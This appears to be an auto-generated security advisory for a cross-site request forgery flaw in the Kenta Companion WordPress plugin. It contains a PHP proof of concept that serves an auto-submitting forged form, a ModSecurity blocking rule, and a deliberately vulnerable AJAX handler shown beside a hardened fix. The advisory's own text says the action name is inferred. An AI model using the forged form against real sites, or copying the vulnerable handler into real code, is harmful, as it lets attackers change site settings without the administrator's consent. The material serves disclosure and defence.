Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-27090: Kenta Companion <= 1.3.3 – Cross-Site Request Forgery (kenta-companion)

Severity: Medium (CVSS 4.3)
CWE: 352
Vulnerable Version: 1.3.3
Patched Version: (none listed)
Disclosed: January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-27090 (metadata-based):

This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the Kenta Companion WordPress plugin, affecting versions up to and including 1.3.3. It stems from missing or incorrect nonce validation on a function, which lets an unauthenticated attacker trick an administrator into performing unintended actions via a forged request. The CVSS score of 4.3 (Medium) reflects the attack's reliance on user interaction and its limited impact on integrity; the score corresponds to the vector AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N.

Atomic Edge research infers that the root cause is a missing nonce check on a privileged WordPress hook. The public description confirms only "missing or incorrect nonce validation on a function"; no patched version or code diff was available when this analysis was written, so what follows is inference from common WordPress plugin patterns rather than a reading of the plugin source. The function is most likely an AJAX handler (registered on a `wp_ajax_` hook) or an admin-post action registered by the plugin, and it performs a state-changing operation without verifying the request nonce (conventionally the `_wpnonce` or `_ajax_nonce` parameter). That omission violates WordPress's security requirements for privileged requests: any request that changes state must carry a nonce bound to the intended action.

Exploitation requires the attacker to craft a web page or link that submits a forged HTTP request to the vulnerable endpoint. When a logged-in administrator visits that page, the browser attaches the administrator's session cookie and the request executes with administrative privileges. Based on WordPress plugin patterns, the likely target is `/wp-admin/admin-ajax.php` with an `action` parameter corresponding to a Kenta Companion handler (the PoC below uses the inferred name `kenta_companion_update_setting`; the real action name has not been confirmed against the plugin source). The payload would be an ordinary POST request containing the parameters for the unauthorized action. Two practical caveats: browsers that default cookies to SameSite=Lax (Chromium-based browsers do) will not send the WordPress auth cookie with a cross-site POST unless the cookie was set less than two minutes earlier, so the attack is more reliable against handlers that also accept GET, which is the case whenever the handler reads `$_REQUEST` or `$_GET`; and if the handler were also registered on a `wp_ajax_nopriv_` hook, no administrator interaction would be needed at all and the issue would be broken access control rather than CSRF, which the published description does not indicate.

Remediation requires adding nonce verification to the vulnerable function: `check_ajax_referer()` for AJAX handlers or `check_admin_referer()` for admin-post actions, using a nonce action name unique to that operation, with the matching nonce generated by `wp_create_nonce()` and delivered to the plugin's own admin page or script. The patched version must also perform a proper capability check (e.g., `current_user_can('manage_options')`) to enforce authorization: a nonce only proves that the request came from the plugin's own UI, not that the user is allowed to perform the action, and any authenticated user, subscribers included, can reach `wp_ajax_` handlers. The primary flaw here, however, is the missing CSRF protection.

Successful exploitation allows an attacker to perform unauthorized actions within the plugin's scope. The impact is limited to integrity (I:L) with no confidentiality or availability loss. The specific actions depend on the vulnerable function but could include changing plugin settings, modifying content, or triggering other administrative operations. Attackers cannot directly steal data or gain code execution through this CSRF flaw alone.

Differential between vulnerable and patched code

No patched version is listed for this entry and no code diff was available at the time of analysis; the root cause above is inferred from the advisory metadata, not from a comparison of plugin releases.

Proof of Concept (PHP)

This script, reconstructed from the Atomic Edge PoC, serves an HTML page whose form submits itself to the target's admin-ajax.php. The target host is a placeholder, and the action hook name is inferred, not confirmed against the plugin.

```php
<?php
// Atomic Edge CVE Research – Proof of Concept (metadata-based)
// CVE-2026-27090 – Kenta Companion <= 1.3.3 – Cross-Site Request Forgery
// The target host is a placeholder; the action name is inferred, not confirmed.
$target_url = 'https://victim.example/wp-admin/admin-ajax.php';
$post_data  = array(
    'action'        => 'kenta_companion_update_setting', // Inferred action hook
    'setting_name'  => 'demo_mode',
    'setting_value' => 'enabled',
    // Note: No '_wpnonce' parameter is included, exploiting the missing check.
);

// Generate the malicious HTML form that auto-submits when the page loads.
echo '<html><body onload="document.forms[0].submit()">';
echo '<form method="POST" action="' . htmlspecialchars($target_url, ENT_QUOTES) . '">';
foreach ($post_data as $key => $value) {
    echo '<input type="hidden" name="' . htmlspecialchars($key, ENT_QUOTES)
        . '" value="' . htmlspecialchars($value, ENT_QUOTES) . '">';
}
echo '</form>';
echo '<p>If you are an authenticated admin, the request was sent.</p>';
echo '</body></html>';

// Optional: Direct cURL execution for testing (remove in real attack scenarios).
// This carries no administrator session cookie, so it only shows how the
// endpoint answers an unauthenticated, nonce-less request; it does not
// demonstrate the CSRF, which needs the victim's browser to supply the cookie.
/*
$ch = curl_init($target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
echo "Response: " . htmlspecialchars((string) $response);
*/
?>
```

ModSecurity Rule

```
# Atomic Edge WAF Rule – CVE-2026-27090 (metadata-based)
# This rule blocks CSRF exploitation attempts targeting the Kenta Companion plugin's vulnerable AJAX endpoint.
# The rule matches requests to the WordPress AJAX handler with the inferred action parameter.
# The absence of a nonce parameter is the exploit signature, but we match the action to avoid false positives.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
    "id:202627090,phase:2,deny,status:403,chain,msg:'CVE-2026-27090: Kenta Companion CSRF via AJAX',severity:'CRITICAL',tag:'CVE-2026-27090',tag:'WordPress',tag:'Plugin:Kenta-Companion',tag:'Attack:CSRF'"
    SecRule ARGS_POST:action "@streq kenta_companion_update_setting" \
        "chain"
    SecRule &ARGS_POST:_wpnonce "@eq 0" \
        "t:none"
```

Two limitations to keep in mind before deploying this rule. `REQUEST_URI` in ModSecurity includes the query string, so `@streq /wp-admin/admin-ajax.php` will not match a request such as `/wp-admin/admin-ajax.php?foo=1`; `REQUEST_FILENAME` with the same operator, or `@endsWith`, is more robust. And the final chain element only tests for the presence of a `_wpnonce` parameter: an attacker who sends any value in `_wpnonce` bypasses the rule (only the plugin can validate the nonce), while a legitimate front end that sends its nonce under a different parameter name (for example `nonce` or `security`, both common in plugins) would be blocked. The `severity:'CRITICAL'` marking is also higher than the CVSS 4.3 (Medium) rating of the issue; adjust it to local conventions.
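The remediation described in the analysis, shown as an added example rather than Kenta Companion's own code: a minimal admin-ajax handler with the defect the advisory describes (state change on a `wp_ajax_` hook with no nonce and no capability check), beside a hardened version and the code that issues the nonce to the plugin's own admin page. The `acme_` prefix, the option name, the action hooks, the nonce action string and the settings page slug are all hypothetical.

```php
<?php
/*
 * Added example, not Kenta Companion code. All names (the 'acme_' prefix,
 * the option name, the action hooks, the nonce action string and the
 * settings page slug) are hypothetical.
 */

// --- Vulnerable pattern -------------------------------------------------
// Registered for logged-in users only (wp_ajax_, no wp_ajax_nopriv_), so an
// anonymous attacker cannot call it directly; but nothing proves the request
// originated from the plugin's own UI, so a forged cross-site request sent by
// an administrator's browser is accepted and acted on.
add_action( 'wp_ajax_acme_update_setting', 'acme_update_setting_vulnerable' );
function acme_update_setting_vulnerable() {
    // $_REQUEST also accepts GET, which sidesteps SameSite=Lax cookie defaults.
    $name  = sanitize_key( $_REQUEST['setting_name'] ?? '' );
    $value = sanitize_text_field( wp_unslash( $_REQUEST['setting_value'] ?? '' ) );
    update_option( 'acme_' . $name, $value ); // state change: no nonce, no capability check
    wp_send_json_success();
}

// --- Hardened pattern ---------------------------------------------------
add_action( 'wp_ajax_acme_update_setting_v2', 'acme_update_setting_hardened' );
function acme_update_setting_hardened() {
    // 1. CSRF: verify the nonce bound to this specific action. With the third
    //    argument false, check_ajax_referer() returns false instead of ending
    //    the request with -1, so we can answer with a JSON error the front end
    //    can handle.
    if ( ! check_ajax_referer( 'acme_update_setting', '_wpnonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid or missing nonce.' ), 403 );
    }

    // 2. Authorization: a nonce proves intent, not privilege. Any logged-in
    //    user (subscriber included) can reach wp_ajax_ hooks, so check the
    //    capability explicitly.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient privileges.' ), 403 );
    }

    // 3. Input validation: accept only allow-listed settings and values, and
    //    read from $_POST rather than $_REQUEST so a crafted GET link cannot
    //    trigger the handler.
    $allowed = array( 'demo_mode' => array( 'enabled', 'disabled' ) );
    $name    = sanitize_key( $_POST['setting_name'] ?? '' );
    $value   = sanitize_text_field( wp_unslash( $_POST['setting_value'] ?? '' ) );
    if ( ! isset( $allowed[ $name ] ) || ! in_array( $value, $allowed[ $name ], true ) ) {
        wp_send_json_error( array( 'message' => 'Unknown setting or value.' ), 400 );
    }

    update_option( 'acme_' . $name, $value );
    wp_send_json_success( array( 'setting' => $name, 'value' => $value ) );
}

// --- Issuing the nonce to the plugin's own admin page ---------------------
// The nonce must reach the legitimate front end. wp_localize_script() exposes
// it to the plugin's admin JavaScript, which sends it back as '_wpnonce'
// alongside 'action=acme_update_setting_v2'.
add_action( 'admin_enqueue_scripts', 'acme_enqueue_admin_js' );
function acme_enqueue_admin_js( $hook_suffix ) {
    if ( 'settings_page_acme' !== $hook_suffix ) { // hypothetical settings page slug
        return;
    }
    wp_enqueue_script( 'acme-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'acme-admin', 'acmeAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'acme_update_setting' ),
    ) );
}
```

The order of the three checks matters: the nonce check comes first so that a forged request is rejected before any capability lookup or input handling, and the capability check stays even though the nonce is present, because a nonce minted for a low-privileged user's session is just as valid as an administrator's.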

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
